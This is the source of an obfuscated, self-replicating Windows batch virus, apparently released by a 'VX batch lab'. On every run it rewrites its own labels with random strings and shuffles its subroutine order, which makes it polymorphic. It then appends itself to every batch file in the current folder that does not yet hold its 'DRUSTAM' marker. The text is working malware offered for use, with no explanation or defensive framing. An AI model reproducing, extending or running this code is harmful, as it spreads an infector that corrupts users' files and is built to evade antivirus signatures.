
====-------=-==-===------====--=-====-----=-=-====----==--=-=-=--=----====--

:MUT1 WWWU
@ECHO OFF>NUL %WWWU%
%WWWU%SET W="%0"
ECHO GOTO MUT1>_%WWWU%
CALL :WWW%-%B SE FO OTO FI I D %WWWU%
ECHO/:MUT0>>_ %WWWU%
%WWWU%FOR %%R IN (RANS DUUF MUT WWW) DO CALL :WWW%-%Q FO ET MO GO EC %%R
%WWWU%CALL :WWW%-%X FO BB SE
DEL _
GOTO MUT0 %WWWU%
%DUUFDUUFDUUFDUUFDUUFDUUFDUUFWWWTDUUFDUUFDUUFDUUFDUUFDUUFDUUFDUUFDUUFDUUF%
REM DUUFDUUFDUUFDUUFDUUFDUUFDUUFWWWTDUUFDUUFDUUFDUUFDUUFDUUFDUUFDUUFDUUFDUUFDUUF
SET DUUFDUUFDUUFDUUFDUUFDUUFDUUFWWWTDUUFDUUFDUUFDUUFDUUFDUUFDUUFDUUFDUUFDUUF=
ECHO DUUFDUUFDUUFDUUFDUUFDUUFDUUFWWWSDUUFDUUFDUUFDUUFDUUFDUUFDUUFDUUFDUUFDUUFDUUF
CLS DUUFDUUFDUUFDUUFDUUFDUUFDUUFWWWSDUUFDUUFDUUFDUUFDUUFDUUFDUUFDUUFDUUFDUUFDUUFDUUF
::DUUFDUUFDUUFDUUFDUUFDUUFDUUFWWWSDUUFDUUFDUUFDUUFDUUFDUUFDUUFDUUFDUUFDUUFDUUF
:WWWQ
%WWWQ_%CALL :WWW%-%V SE TO
%1R /F "DELIMS=" %%I IN (_) DO (
S%2 WWWQ=%%I
CMD/V/C ECHO/!WWWQ:%6^^=%RANS%!>>_M
%WWWQ_%)
%3VE _M _
%4TO :EOF %WWWQ_%
:WWWX
%1R %%W IN (*.%2T) DO %3T WWWX="%%W"&CALL :WWWXV Y IND
EXIT /B %WWWX%
:WWWXV
F%2 "DRUSTAM" <%WWWX%>NUL.WWWX
IF ERRORLEVEL 1 ECHO.>>%WWWX%&TYPE _>>%WWWX%
%WWWX0%GOTO :EOF
:WWWV
%1T /A RANS=%RANDOM%+%RANDOM:0,2%%WWWV%
%1T RANS=%RANS:1=E%%WWWV%
%1T RANS=%RANS:2=S%%WWWV%
%1T RANS=%RANS:3=D%%WWWV%
%1T RANS=%RANS:4=G%%WWWV%
%1T RANS=%RANS:5=H%%WWWV%
%1T RANS=%RANS:6=I%%WWWV%
%1T RANS=%RANS:7=P%%WWWV%
%1T RANS=%RANS:8=O%%WWWV%
%1T RANS=%RANS:9=Z%%WWWV%
%1T RANS=%RANS:0=X%%WWWV%
GO%2 :EOF %WWWV%
:WWWB
%1T /A RANSO=1+(6-1+1) * %RANDOM%/32768%WWWB%
IF %RANSO%==1 %1T CV=T S U B X Q V%WWWB%
IF %RANSO%==2 %1T CV=U B S X Q V T%WWWB%
IF %RANSO%==3 %1T CV=B X Q S V T U%WWWB%
IF %RANSO%==4 %1T CV=X Q V T S U B%WWWB%
IF %RANSO%==5 %1T CV=Q V T U B S X%WWWB%
IF %RANSO%==6 %1T CV=V T U B X Q S%WWWB%
PAUSE
%2R %%_ %5N (%CV%) %6O %4ND "WWW%%_" <%W%>>_ %WWWB%
G%3 :EOF %WWWB%
:MUT0
EXIT


====-------=-==-===------====--=-====-----=-=-====----==--=-=-=--=----====--
 V2 (SPBUEP_MOD)
====-------=-==-===-----==
| DR RUSTAM/VX BATCH LAB |
====--=-====-----=-=-====-
